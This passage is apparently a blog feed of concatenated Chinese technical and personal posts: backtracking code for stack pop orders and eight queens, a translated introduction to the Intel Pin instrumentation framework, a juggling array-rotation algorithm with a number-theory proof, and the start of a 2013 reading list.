<p>in=4时,in=input[0],接着in=5,index=1;</p>
</li>
<li>
<p>栈顶3与序列中input[index]相等,index=2;一直到0都相等;此时,index=5,in=5,栈s为空;</p>
</li>
<li>
<p>5小于9,将5,6,7,8入栈;</p>
</li>
</ol>
<p>剩下的跟1~3步类似了。</p>
<p>代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public class StackSeq
{
public static boolean isOk(int[] input,int n)
{
int index = 0;
int in = 0;
Stack<Integer> s = new Stack<Integer>();
while(true)
{
if(index >= n - 1)
return true;
if(in >= n)
return false;
if(in != input[index])
{
s.push(in);
++in;
continue;
}
++in;
++index;
while(!s.isEmpty() && s.peek() == input[index])
{
++index;
s.pop();
}
}
}
public static void main(String[] args)
{
StdOut.println("input the number of arrays:");
int n = StdIn.readInt();
int[] input = new int[n];
while(true)
{
for (int i = 0 ; i < n ; ++i)
{
input[i] = StdIn.readInt();
}
boolean ret = isOk(input,n);
if(ret == true)
{
StdOut.println("the sequeue is ok!");
}
else
StdOut.println("the sequeue is not ok!");
}
}
}
</code></pre></div></div>
<p>原谅我那蹩脚的java。</p>
<h3 id="第二节">回溯简介</h3>
<p>知道了如何判断一个序列是否是正确的出栈序列,我们自然会想到求出所有的正确出栈序列。这也是本文的主题,回溯算法。回溯算法的思想还是比较简单,我在百度百科摘了一段如下:</p>
<p>从一条路往前走,能进则进,不能进则退回来,换一条路再试。八皇后问题就是回溯算法的典型,第一步按照顺序放一个皇后,然后第二步符合要求放第2个皇后,如果没有符合条件的位置符合要求,那么就要改变第一个皇后的位置,重新放第2个皇后的位置,直到找到符合条件的位置就可以了。回溯在迷宫搜索中使用很常见,就是这条路走不通,然后返回前一个路口,继续下一条路。回溯算法说白了就是穷举法。不过回溯算法使用剪枝函数,剪去一些不可能到达 最终状态(即答案状态)的节点,从而减少状态空间树节点的生成。回溯法是一个既带有系统性又带有跳跃性的的搜索算法。它在包含问题的所有解的解空间树中,按照深度优先的策略,从根结点出发搜索解空间树。算法搜索至解空间树的任一结点时,总是先判断该结点是否肯定不包含问题的解。如果肯定不包含,则跳过对以该结点为根的子树的系统搜索,逐层向其祖先结点回溯。否则,进入该子树,继续按深度优先的策略进行搜索。回溯法在用来求问题的所有解时,要回溯到根,且根结点的所有子树都已被搜索遍才结束。而回溯法在用来求问题的任一解时,只要搜索到问题的一个解就可以结束。这种以深度优先的方式系统地搜索问题的解的算法称为回溯法,它适用于解一些组合数较大的问题。</p>
<p>我在网上找到了<a href="http://www.csie.ntnu.edu.tw/~u91029/Backtracking.html#1">这里</a>有一个比较好的说明。这里我们用求1,2,3…n数里面r个数的排列来简要介绍一下回溯算法。在上面的链接中偷了一张图</p>
<p><img src="/assets/img/backtrack/1.png" alt="" /></p>
<p>也就是第一步的时候我们选择1——n中一个数,比如选了1,然后再在剩下的n-1个数中求出其排列,完了,我们再回溯到第一步,选择2,之后的依此类推。为了不产生重复的数字,我们在进行下一步的前进之前进行了判断。代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
int count = 0;
void print(int* a,int m)
{
for (int k = 0; k < m; ++k)
{
cout << a[k] << " ";
}
cout << endl;
}
void tuple(int* a,int i,int m,int n)
{
if(i == m)
{
print(a,m);
count++;
return;
}
for (int k = 1; k <= n; ++k)
{
for (int h = 0; h < i; ++h)
{
if(a[h] == k)
{
goto LOOP;
}
}
a[i] = k;
tuple(a,i+1,m,n);
LOOP:
continue;
}
}
int main()
{
int a[1000];
int n,m;
cout << "input C(n,m) :\n";
cin >> n >> m;
cout << "("<< n <<","<< m << ")排列数" << endl;
tuple(a,0,m,n);
}
</code></pre></div></div>
<p>根据这段代码求组合数跟全排列也很简单了。总结一下使用递归解回溯,递归函数第一部分判断递归终止条件,然后是递归进入下一个维度,之后回溯。</p>
<h3 id="第三节">所有可能出栈顺序</h3>
<p>我们来看看这个问题如何使用回溯法。</p>
<p>关键的点就在,“一个元素i入栈之后,我们面临两种选择,i出栈,或者i+1入栈”,这就有了回溯的基础。而问题的终点就是有了N个元素之后。递归函数就应该这样设计</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public static void printiter(int n,int cur,Stack<Integer> tmp,Vector<Integer> out)
</code></pre></div></div>
<p>n是元素个数,解的维度,cur表示当前的维度,tmp表示2中选择中的进栈,out存放的出栈的元素。终止条件显然是out的元素个数是n。得源码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public static void printiter(int n,int cur,Stack<Integer> tmp,Vector<Integer> out)
{
if(n == out.size())
{
for(int i : out)
{
StdOut.print(i + " ");
}
StdOut.println("");
count++;
return;
}
if(cur != n)//入栈
{
tmp.push(cur);
printiter(n,cur + 1,tmp,out);
tmp.pop();
}
if(!tmp.isEmpty())
{
int x = tmp.pop();
out.add(x);
printiter(n,cur,tmp,out);
out.remove(out.size() - 1);
tmp.push(x);
}
}
</code></pre></div></div>
<h3 id="第四节">八皇后问题</h3>
<p>借这个机会再来说说八皇后这个老问题。8*8的棋盘上放8只皇后,使得每一只都不相互攻击对方。我们一步一步用上面的思路来解决这个问题。容易想到使用</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bool solution[7][7]
</code></pre></div></div>
<p>来表示每个位置的是否放皇后,如果为false则不妨,true就放皇后。我们首先可以得出如下的结构,能够将所有的可能计算出来。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
#define N 8
bool solution[N][N] = {false};
void print_solution()
{
for (int i = 0; i < N; ++i)
{
for (int j = 0; j < N; ++j)
{
cout << solution[i][j] <<" ";
}
cout << endl;
}
cout << "\n\n\n";
}
void QueenIter(int x,int y)
{
if(y == N)
{
x++;
y = 0;
}
if(x == N)
{
print_solution();
return;
}
solution[x][y] = true;
QueenIter(x,y+1);
solution[x][y] = false;
QueenIter(x,y+1);
}
int main()
{
QueenIter(0,0);
}
</code></pre></div></div>
<p>看出结构也是首先判断是否终止,然后遍历该维度能取得所有值,进入下一个维度。(该例输出太大,若要跑程序,建议将N改成4)</p>
<p>下面的步骤是排除所有不可能的解,很明显只有当要放皇后的时候才需要判断。</p>
<p>我们建立4个bool数组,数组中的每个元素记录这个位置还能否放皇后。为了使得皇后的个数为8,我们还需要增加一个参数c,只有c等于8时,我们才输出方案。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void QueenIter(int x,int y,int c)
{
if(y == N)
{
x++;
y = 0;
}
if(x == N)
{
if(c==N)
{
print_solution();
}
return;
}
int d1 = (x+y) % 15;
int d2 = (x-y + 15) % 15;
if(!mx[x] && !my[y] && !md1[d1] && !md2[d2])
{
mx[x] = my[y] = md1[d1] = md2[d2] = true;
solution[x][y] = true;
QueenIter(x,y+1,c+1);
mx[x] = my[y] = md1[d1] = md2[d2] = false;
}
solution[x][y] = false;
QueenIter(x,y+1,c);
}
</code></pre></div></div>
<p>由于一行只能放置1个皇后,可以改进一下,改进后如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
#define N 8
int solution[N] = {0};
bool my[8],md1[15],md2[15];
int count = 0;
void print_solution()
{
for (int i = 0; i < N; ++i)
{
for (int j = 0; j < solution[i]; ++j)
{
cout << 0 << " ";
}
cout << 1 << " ";
for (int j = solution[i] + 1; j < N; ++j)
{
cout << 0 << " ";
}
cout << endl;
}
cout << "\n\n\n";
}
void Queen(int x)
{
if(x == 8)
{
print_solution();
count++;
return;
}
for (int i = 0; i < N; ++i)
{
int d1 = (x+i) % 15;
int d2 = (x-i+15) % 15;
if (!my[i] && !md1[d1] && !md2[d2])
{
my[i] = md1[d1] = md2[d2] = true;
solution[x] = i;
Queen(x+1);
my[i] = md1[d1] = md2[d2] = false;
}
}
}
int main()
{
Queen(0);
cout << count << endl;
}
</code></pre></div></div>
Intel Pin简介2014-01-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/02/intro-to-pin
<h3>1. Intel Pin简介</h3>
<p>Pin是Intel公司开发的动态二进制插桩框架,可以用于创建基于动态程序分析工具,支持IA-32和x86-64指令集架构,支持windows和linux。</p>
<p>简单说就是Pin可以监控程序的每一步执行,提供了丰富的API,可以在二进制程序程序运行过程中插入各种函数,比如说我们要统计一个程序执行了多少条指令,每条指令的地址等信息。显然,这样我们对程序完全掌握了以后是可以做很多事的。比如对程序的内存使用检测,对程序的性能评估,实际上我是在很多介绍Taint分析的文章中知道Pin,我也准备对Pin写一个系列的文章。</p>
<h3>2. PinTools的编译</h3>
<p>本节简单叙述一下PinTools在windows下的编译</p>
<p>1.<a href="http://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool">Pin官网</a>按照VS的版本选择对应的Pin版本</p>
<p>2.安装<a href="http://www.cygwin.com/">Cygwin</a>,记得选择安装make工具</p>
<p>3.安装好Cygwin之后,将Cygwin目录下面的bin目录添加到环境变量Path中</p>
<p>4.通过VS的命令行进入pin/source/tools/ManualExamples目录下,使用make命令即可编译ManualExamples下的例子,也可以在tools目录下编译所有PinTools,windows下生成的文件一般都是dll。</p>
<h3>3. 使用示例</h3>
<p>在cmd下运行命令(test.exe自己随便写的helloword,itrace.dll就是2中编译出来的manualExamples/obj-ia32下面的dll)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pin -t itrace.dll -- test.exe
</code></pre></div></div>
<p>结果会在文件夹下面生成一个itrace.out文件,里面记录的就是各个指令的地址,通过与OD里面的反汇编的结果我们可以看到,pin并不是从二进制映像文件的第一条指令记录,而是从进程的指令记录(似乎也不是第一条),也就是ntdll里面线程执行函数开始的。</p>
<h3>4. Pin深入</h3>
<p>本部分翻译自<a href="http://software.intel.com/sites/landingpage/pintool/docs/62141/Pin/html/index.html#INSTRUMENTING">Pin文档</a>,肯定有不少问题,欢迎指正。</p>
<h4>Pin</h4>
<p>认识Pin的最好方法是认为它是一个JIT编译器。这个编译器的输入不是字节码而是普通的可执行文件。Pin截获这个可执行文件的第一条指令,产生新的代码序列。接着将控制流程转移到这个产生的序列。产生的序列基本上跟原来的序列是一样的,但是Pin保证在一个分支结束后重新获得控制权。重新获得控制权之后,Pin为分支的目标产生代码并且执行。Pin通过将所有产生的代码放在内存中,以便于重新使用这些代码并且可以直接从一个分支跳到另一个分支,这提高了效率。</p>
<p>在JIT模式,执行的代码都是Pin生成的代码。原始代码仅仅是用来参考。当生成代码时,Pin给用户提供了插入自己代码的机会(插桩)。</p>
<p>Pin的桩代码都会被实际执行的,不论他们位于哪里。大体上,对于条件分支存在一些异常,比如,如果一个指令从不执行,它将不会被插入桩函数。</p>
<h4>Pintools</h4>
<p>概念上说,插桩包括两个组件:</p>
<ul>
<li>决定在哪里插入什么代码的机制</li>
<li>插入点执行的代码</li>
</ul>
<p>这两个组件就是<strong>桩</strong>和<strong>分析</strong>
代码。两个组件都在一个单独的可执行体重,即<strong>Pintool</strong>。Pintools可以认为是在Pin中的的插件,它能够修改生成代码的流程。</p>
<p>Pintool注册一些桩回调函数在Pin中,每当Pin生成新的代码时就调用回调函数。这些回调函数代表了桩组件。它可以检查将要生成的代码,得到它的静态属性,并且决定是否需要以及在哪里插入调用来分析函数。</p>
<p>分析函数收集关于程序的数据。Pin保证整数和浮点指针寄存器的状态在必要时会被保存和回复,允许传递参数给(分析)函数。</p>
<p>Pintool也可以注册一些事件通知回调,比如线程创建和fork,这些回调大体上用于数据收集或者初始化与清理。</p>
<h4>Observations</h4>
<p>由于Pintool类似插件一样工作,所以它必须处于Pin与被插桩的可执行文件的地址空间。这样,Pintool就能够访问可执行文件的所有数据。它也跟可执行文件共享文件描述符与进程其他信息。</p>
<p>Pin和Pintool从第一条指令控制程序。对于与共享库一起编译的可执行文件,这意味着动态加载器和共享库将会对Pintool可见。</p>
<p>当编写tools时,最重要的是调整分析代码而不是桩代码。因为桩代码执行一次,而分析代码执行许多次。</p>
<h4>Instrumentation Granularity</h4>
<p>如上所述,Pin的插桩是实时的。插桩发生在一段代码序列执行之前。我们把这种模式叫做踪迹插桩(trace instrumentation)。</p>
<p>踪迹插桩让Pintool在可执行代码每一次执行时都能进行监视和插装。trace通常开始于选中的分支目标并结束于一个条件分支,包括调用(call)和返回(return)。Pin能够保证trace只在最上层有一个入口,但是可以有很多出口。如果在一个trace中发生分支,Pin从分支目标开始构造一个新的trace。Pin根据基本块(BBL)分割trace。一个基本块是一个有唯一入口和出口的指令序列。基本块中的分支会开始一个新的trace也即一个新的基本块。通常为每个基本块而不是每条指令插入一个分析调用。减少分析调用的次数可以提高插装的效率。trace插装利用了TRACE_AddInstrumentFunction API call。</p>
<p>注意,虽然Pin从程序执行中动态发现执行流,Pin的BBL与编译原理中的BBL定义不同。如,考虑生成下面的switch statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>switch(i)
{
case 4: total++;
case 3: total++;
case 2: total++;
case 1: total++;
case 0:
default: break;
}
</code></pre></div></div>
<p>它将会产生如下的指令(在IA-32架构上)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.L7:
addl $1, -4(%ebp)
.L6:
addl $1, -4(%ebp)
.L5:
addl $1, -4(%ebp)
.L4:
addl $1, -4(%ebp)
</code></pre></div></div>
<p>在经典的基本块中,每一个addl指令会成为一个单指令基本块。但是Pin会对不同的这几种不同的switch cases产生包含4条指令的BBL(当遇到.L7 case),3个基本块(当遇到.L6 case),如此类推。这就是说Pin的BBL个数会跟用书上的定义的BBL不一样。例如,这里当代码分支到.L7时,有1个BBL,但是有四个经典的基本块被执行。</p>
<p>Pin也会拆散其他指令为BBL,比如cpuid,popf,和rep前缀的指令。因为rep前缀治理那个被当做隐式的循环,如果一个rep前缀指令不止循环一次,在第一次之后将会产生一个单指令的BBL,所以这种情形会产生比你预期多的基本块。</p>
<p>为了方便编写Pintool,Pin还提供乐指令插桩模式(instruction instrumentation),让工具可以监视和插装每一条指令。本质上来说这两种模式是一样的,编写Pintool时不需要在为trace的每条指令反复处理。就像在trace插桩模式下一样,特定的基本块和指令可能会被生成很多次。指令插装用到了 INS_AddInstrumentFunction API call。</p>
<p>有时,进行不同粒度的插桩比trace更有用。Pin对这种模式提供了两种模式:镜像和函数插桩。这些模式是通过缓存插桩要求,因此需要额外的空间,这些模式也称作提前插桩。</p>
<p>镜像插装让Pintool在IMG第一次导入的时候对整个image进行监视和插装。Pintool的处理范围可以是镜像中的每个块(section,SEC),块中的每个函数(routine, RTN),函数中的每个指令(instruction, INS)。插装可以在一个函数或者一条指令开始执行之前或者结束执行之后执行。镜像插装用到了 IMG_AddInstrumentFunction API call。镜像插装依靠符号信息判断函数的边界,因此需要在PIN_Init之前调用PIN_InitSymbols。</p>
<p>函数插装让Pintool在线程第一次调用之前监视和插装整个函数。Pintool的处理范围可以是函数里的每条指令。这里没有足够的信息把指令归并成基本块。插装可以在一个函数或者一条指令开始执行之前或者结束执行之后执行。函数插桩时Pintool的作者能够更方便的在镜像插桩过程中便利各个sections。</p>
<p>函数插装用到了RTN_AddInstrumentFunction API call。插装在函数结束后不一定能可靠地工作,因为当最后出现调用时无法判断何时返回。</p>
<p>注意在镜像插桩和函数插桩中,不可能知道一个(分析)函数会被执行(因为这些插桩实发生在镜像被载入时)。在Trace和Instruction中只有被执行的代码才会被遍历。</p>
<h4>Managed platforms support</h4>
<p>Pin支持所有可执行文件包括托管的二进制文件。从Pin的角度来看,托管文件是一种自修改程序。有一种方法可以使Pin区分即时编译的代码(Jitted代码)和所有其他动态生成的代码,并且将Jitted代码与合适的管理函数联系在一起。为了支持这个功能,运行管理托管平台的JIT compiler必须支持Jit Profiling API。</p>
<p>必须支持下面的功能:</p>
<ul>
<li>RTN_IsDynamic() API用来识别动态生成的代码。一个函数必须被Jit Profiling API标记为动态生成的。</li>
<li>一个Pin tool可以使用RTN_AddInstrumentFunction API加入Jitted函数</li>
</ul>
<p>为了支持托管平台,以下条件必须满足:</p>
<ul>
<li>
<p>设置INTEL_JIT_PROFILER32和INTEL_JIT_PROFILER64环境变量,以便占用pinjitprofiling dynamic library</p>
<ol>
<li>
<p>For Windows</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> set INTEL_JIT_PROFILER32=<The Pin kit full path>\ia32\bin\pinjitprofiling.dll
set INTEL_JIT_PROFILER64=<The Pin kit full path>\intel64\bin\pinjitprofiling.dll
</code></pre></div> </div>
</li>
<li>
<p>For Linux</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> setenv INTEL_JIT_PROFILER32 <The Pin kit full path>/ia32/bin/libpinjitprofiling.so
setenv INTEL_JIT_PROFILER64 <The Pin kit full path>/intel64/bin/libpinjitprofiling.so
</code></pre></div> </div>
</li>
</ol>
</li>
<li>
<p>在Pin命令行为Pin tool加入knob support_jit_api选项</p>
</li>
</ul>
<h4>Symbols</h4>
<p>Pin利用符号对象(SYM)提供了对函数名字的访问。符号对象仅仅提供了在程序中的关于函数的符号。其他类型的符号(如数据符号)需要通过tool独立获取。</p>
<p>在Windows上,可以通过dbghelp.dll实现这个功能。注意在桩函数中使用dbghelp.dll并不安全,可能会导致死锁。一个可能的解决方案是通过一个不同的未被插桩的进程得到符号。</p>
<p>在Linux上,libefl.so或者libdwarf.so可以用来获取符号信息。</p>
<p>为了通过名字访问函数必须先调用PIN_InitSymbols。</p>
<h4>Floating Point Support in Analysis Routines</h4>
<p>Pin在执行各种分析函数时保持者程序的浮点指针状态。</p>
<p>IARG_REG_VALUE不能作为浮点指针寄存器参数传给分析函数。</p>
<h4>Instrumenting Multi-threaded Applications</h4>
<p>给多线程程序插桩时,多个合作线程访问全局数据时必须保证tool是线程安全的。Pin试图为tool提供传统C++程序的环境,但是在一个Pintool是不可以使用标准库的。比如,Linux tool不能使用pthread,Windows不能使用Win32API管理线程。作为替代,应该使用Pin提供的锁和线程管理API。</p>
<p>Pintools在插入桩函数时,不需要添加显示的锁,因为Pin是在得到VM lock内部锁之后执行这些函数的。然而,Pin并行执行分析代码和替代函数,所以Pintools如果访问这些函数,可能需要为全局数据加锁。</p>
<p>Linux上的Pintools需要注意在分析函数或替代函数中使用C/C++标准库函数,因为链接到Pintools的C/C++标准函数不是线程安全的。一些简单C/C++函数本身是线程安全的,在调用时不需要加锁。但是,Pin没有提供一个线程安全函数的列表。如果有怀疑,需要在调用库函数的时候加锁。特别的,errno变量不是多线程安全的,使用这个变量的tool需要提供自己的锁。注意这些限制仅存在Unix平台,这些库函数在Windows上是线程安全的。</p>
<p>Pin可以在线程开始和结束的时候插入回调函数。这为Pintool提供了一个比较方便的地方分配和操作线程局部数据。</p>
<p>Pin也提供了一个分析函数的参数(ARG_THREAD_ID),用于传递Pin指定的线程ID给调用的线程。这个ID跟操作系统的线程ID不同,它是一个从0开始的小整数。可以作为线程数据或是用户锁的索引。</p>
<p>除了Pin线程ID,Pin API提供了有效的线程局部存储(TLS),提供了分配新的TLS key并将它关联到指定数据的清理函数的选项。进程中的每个线程都能够在自己的槽中存储和取得对应key的数据。所有线程中key对应的value都是NULL。</p>
<p>False共享发生在多个线程访问相同的缓cache line的不同部分,至少其中之一是写。为了保持内存一致性,计算机必须将一个CPU的缓存拷贝到另一个,即使其他数据没有共享。可以通过将关键数据对其到cache line上或者重新排列数据结构避免False共享。</p>
<h4>Avoiding Deadlocks in Multi-threaded Applications</h4>
<p>因为Pin,the tool和程序可能都会要求或释放锁,Pin tool的开发者必须小心避免死锁。死锁经常发生在两个线程以不同的顺序要求同样的锁。例如,线程A要求lock L1,接着要求L2,线程B要求lock L2,接着要求L1。如果线程A得到了L1,等待L2,同时线程B得到了L2,等待L1,这就导致了死锁。为了避免死锁,Pin为必须获得的锁强加了一个层次结构。Pin在要求任何锁时会要求自己的内部锁。我们假设应用将会在这个层次结构的顶端获得锁。下面的图展示了这种结构:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Application locks -> Pin internal locks -> Tool locks
</code></pre></div></div>
<p>Pin tool开发者在设计他们自己的锁时不应该破坏这个锁层次结构。下面是基本的指导原则:</p>
<ul>
<li>
<p>如果tool在一个Pin回调中要求任何锁,它在从这个回调中返回时必须释放这些锁。从Pin内部锁看来,在Pin回调中占有一个锁违背了这个层次结构。</p>
</li>
<li>如果tool在一个分析函数中请求任何锁,它从这个分析函数中返回时必须释放这些锁。从Pin内部锁和程序自身看来,在分析函数中占有一个锁违背了这个层次结构。</li>
<li>如果tool在一个Pin回调或者分析函数中调用Pin API,它不应该在调用API的时候占有任何锁。一些Pin API使用了内部Pin锁,所以在调用这些API时占有一个tool锁违背了这个层次结构。</li>
<li>如果tool在分析函数里面调用了Pin API,它可能需要在要求Pin客户锁时调用PIN_LockClient()。这取决于API,需要查看特定API的更多信息。注意tool在调用PIN_Lockclient()时,不能占有任何上述所述其他锁。</li>
</ul>
<p>虽然上述的指导在大多数情况下已经足够,但是它们活血在某些特定的情形下显得比较严格。下面的指导解释了上述基本指导的放松情形:</p>
<ul>
<li>
<p>在JIT模式下,tool可能在分析函数中要求锁而不释放它们,直到将要离开包含这个分析函数的trace。tool必须期望trace在程序还没有抛出异常的时尽早退出。任何被tool占有的锁L在程序抛出异常时,必须遵守以下规则:</p>
<ul>
<li>tool必须建立一个当程序抛出异常时的处理回调,这个回调会释放之前得到的锁L。可以使用PIN_AddContextChangeFunction()建立这个回调。</li>
<li>为了避免破坏这个层次结构,tool禁止在Pin回调中要求锁。</li>
</ul>
</li>
<li>
<p>如果tool从一个分析函数中调用Pin API,如果在调用API时繁盛了下面情况,它可能会要求并占有一个锁L:</p>
<ul>
<li>锁L不是从任何Pin回调中请求的。这避免了违背这个层次结构。</li>
<li>被调用的Pin API不会导致程序代码被执行。这避免了违背这个层次结构。</li>
</ul>
</li>
</ul>
杂耍算法及其证明2013-12-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2013/12/22/zashua
<!--script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"-->
<!-- mathjax config similar to math.stackexchange -->
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML" type="text/javascript"></script>
<p> 这是编程珠玑上面的一个题,也是笔试中出烂了的题目。题目非常简单,描述如下:将一个n元一维向量向左旋转i个位置,例如当n=8,i=3时,向量abcdefgh旋转为defghabc。简单的代码使用一个n元的中间向量在n步内完成该工作。你能否仅使用额外字节的存储空间,在正比于n的时间内完成向量的旋转?</p>
<p> 下面是最简单的一种解法。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <iostream>
using namespace std;
void reverse(char *a,int beg, int end)
{
char tmp;
for (; beg < end; beg++, end-- )
{
tmp = a[beg];
a[beg] = a[end];
a[end] = tmp;
}
}
void LeftReverse(char *a,int n, int k)
{
reverse(a,0,k - 1);
reverse(a,k,n - 1 );
reverse(a,0,n - 1);
}
int main()
{
char test[] = "123abcdefg" ;
LeftReverse(test,strlen(test),3);
printf( "reversed:%s",test);
return 0;
}
</code></pre></div></div>
<p> 当然,今天的主题不是这个,而是书中提到的另一种解法:英文是啥给忘了,翻译成“杂耍算法”。这个算法的步骤是这样的:move x[0] to the temporary t, then move x[i] to x[0], x[2i] to x[i], and so on, until we come back to taking an element from x[0], at which point we instead take the element from t and stop the process.
If that process didn’t move all the elements , then we start over at x[1], and continue until we move all the elements.具体代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <iostream>
using namespace std;
int gcd(int a,int b)
{
int c;
if (a < b)
{
c = a;
a = b;
b = c;
}
while(b)
{
if(a % b == 0)
return b;
else
{
c = a % b;
a = b;
b = c;
}
}
}
void rotate(char * a,int n, int k)
{
char tmp;
int j;
for (int i = 0; i < gcd(n,k); ++i)
{
tmp = a[i];
for (j = i + k; j!= i; j = (j + k) % n)
{
a[(j-k+n) % n] = a[j];
}
j = (j - k + n ) % n;
a[j] = tmp;
}
}
int main()
{
char a[] = "abc12345678" ;
cout << "gcd(11,3):" << gcd(11,3) << endl;
rotate(a,11,3);
printf ( "after rotate:%s\n",a);
return 0;
}
</code></pre></div></div>
<p>经过如下图所示的步骤之后,就完成了移位,此例中i=3,n=11。</p>
<p><img src="/assets/img/zacou/zacou.jpg" alt="" /></p>
<p> 这个算法会在执行\(gcd(i,n)\)次后就停止了,为什么?这就涉及到数论知识了,也就是今天的主题。</p>
<p> 数论中有这样一个结论:\(n\)个数</p>
\[0\,mod\,n,\quad i\,mod\,n,\quad 2i\,mod\,n,\quad \cdots,\quad (n-1)i\,mod\,n\quad (1)\]
<p>按照某种次序恰好组成\(\frac{n}{d}\)个数</p>
\[0,\quad d,\quad 2d,\quad \cdots,\quad n-d\quad \quad (1)\]
<p>的\(d\)份复制,其中\(d=gcd(i,n)\).例如,当\(n=12\)且\(i= 8\)时,有\(d=4\),这些数就是\(0,8,4,0,8,4,0,8,4,0,8,4\).</p>
<p> 证明(指出我们得到前面\(\frac{n}{d}\)个值的\(d\)份复制)的第一部分是显然的,根据同余式的基本理论,我们有</p>
\[ji\equiv ki(mod\,n)\Leftrightarrow j\frac{i}{d}\equiv k\frac{i}{d}(mod\,\frac{n}{d})\]
<p>可以看到当\(0\leqslant k< \frac{n}{d}\)时,我们得到了就是这\(\frac{n}{d}\)个数的\(d\)份复制,\(k\)的取值就是模数为\(\frac{n}{d}\)的最小完全非负剩余系中的数。</p>
<p> 现在证明这\(\frac{n}{d}\)个数就是\({0,d,2d,\cdots,n-d}\)(按照某种次序排列)。记\(i={i}'d,n={n}'d\).根据mod的分配率\(c(x\,mod\,y)=(cx)\,mod\,(cy)\),就有</p>
\[ki\,mod\,n=d(k{i}'\,mod\,{n}')\]
<p>所以当\(0\leqslant k< {n}'\)时出现的那些值就是\(d\)乘以以下诸数</p>
\[0\,mod\,{n}',\quad {i}'\,mod\,{n}',\quad {2{i}'}\,mod\,{n}',({n}'-1){i}'\,mod\,{n}'\]
<p>我们知道\(({i}',{n}')=1\),所以我们只需要证明\(d=1\)的情况,也就是\(i\)与\(n\)互素的情况。</p>
<p>现在我们假设\((i,n)=1\),(1)式中的数是各不相同的,如若不然,取\(k,j\in [0,n-1],k\neq j\),假设\(ki=ji\),则有\(ki\equiv ji(mod\,n)\)。由于\((i,n)=1\),则\(k\equiv j(mod\,n)\),所以\(k=j\),显然矛盾。所以(1)中的数恰好就是\(0,1,2,\cdots,n-1\)</p>
<p> 结论证完,下面回到例子简要分析,在本例中\(n=11,i=3,gcd(11,3)=1\),于是</p>
\[0,3\,mod\,11,6\,mod\,11,\cdots,10*3\,mod\,11\]
<p>的值恰好就是\(11\)的最小非负完全剩余系按一定顺序 排列的结果。所以经过如下的步骤</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>t = x[0]
x[0] = x[i mod n]
x[i mod n] = x[2i mod n]
……
x[(n-2)*i mod n] = x[(n-1)*i mod n]
x[(n-1)*i mod n] = t
</code></pre></div></div>
<p>之后,所有的元素都到了该去的地方,</p>
<p> 当\((n,i)=d(d\neq 1)\)怎么办呢。从上面的结论我们可以知道每隔\({n}'=\frac{n}{d}\)之后,序列会从\(0,d,2d,\cdots,{n}'-d\)的某个序列重新开始,这样我们就又遇到\(x[0]\)了。这个时候我们需要将\(x[1]\)移到\(t\),重复上述步骤,我们简要看看图示。</p>
<p><img src="/assets/img/zacou/12.jpg" alt="" /></p>
<p>看看图示就明了了。</p>
<p> 这是复习数论的时候遇到的一个结论,然后想起曾经的一个题。现在确实是完全清晰了。人说,数学是科学的女皇,数论是数学的女皇,数论里面充满着迷人的结论。这世间充满了美妙,我希望能够与诸君分享。</p>
2013我的私人阅读十佳2013-12-05T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2013/12/05/booklist
<p> 微信“不止读书”的主人魏小河最近发起了“私人阅读十佳”的活动,让筒子们对这一年的阅读做一个梳理和盘点。看了几个书单,基本上每个书单都有我看过的很喜欢的书,
趁着博客刚刚搭好,自己也总结了一下。不过10本实在是太难选,太难选,好多好书都未能选上。</p>
<p><strong>1. <a href="http://book.douban.com/subject/1003479/">中国历代政治得失</a></strong></p>
<p><img src="/assets/img/booklist/1.jpg" alt="" /></p>
<p> 这是我经常向人推荐的,钱穆先生的名号想必不必多言。钱老从政治组织,选举制度,经济制度,兵役赋税制度对汉、唐、宋、明、清五朝进行了分析。真的是有理有据,很有思考性,书也薄,不到200页。其实我很喜欢钱老的风格,钱穆强调不要因为政治需要就用专制、黑暗否定,抹杀过去的一切,而是要从对历代的政制进行深刻的分析,尊重历史客观。</p>
<p><strong>2. <a href="http://book.douban.com/subject/23008971/">平如美棠</a></strong></p>
<p><img src="/assets/img/booklist/2.jpg" alt="" /></p>
<p> 这本书真的很令人感动,讲的其实只是一对平凡夫妻的事情,里面有一段话我一直都记得“对我们平凡人而言,生命中许多微细小事,并没有什么特别缘故地就在心深处留下印记,天长日久便成为弥足珍贵的回忆。”
就如很多年之前,作为一个很有理想的骚年,一味的向前,错失了很多东西,多年之后我才明白,活在当下才是最重要的,平凡真的不是一个坏事。顺说,这本书的装帧很好,很有感觉。</p>
<p><strong>3. <a href="http://book.douban.com/subject/3674537/">明朝那些事</a></strong></p>
<p><img src="/assets/img/booklist/3.jpg" alt="" /></p>
